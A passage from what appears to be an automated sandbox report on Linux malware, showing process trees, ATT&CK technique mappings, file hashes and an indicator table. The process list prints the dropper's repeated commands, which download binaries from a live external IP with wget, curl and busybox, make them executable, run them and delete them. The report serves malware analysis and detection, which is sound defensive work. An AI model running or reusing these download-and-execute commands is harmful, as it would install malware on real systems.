  PID:945
- /usr/bin/wget
  wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:946
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:947
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:948
- /bin/chmod
  chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - File and Directory Permissions Modification
  PID:949
- /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  ./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Executes dropped EXE
  PID:950
- /bin/rm
  rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:951
- /usr/bin/wget
  wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:952
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:953
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:954
- /bin/chmod
  chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - File and Directory Permissions Modification
  PID:955
- /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  ./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Executes dropped EXE
  PID:956
- /bin/rm
  rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:957
- /usr/bin/wget
  wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:958
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:959
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	727	OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	734	LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	743	pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	771	6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	800	UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	808	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	842	Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	848	0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	854	Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	860	V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	866	zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	872	BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	878	2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	884	PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	890	Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	896	0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	902	Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	908	V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	914	zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	920	BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	926	2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	932	PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	938	OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	944	LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	950	pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	956	6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3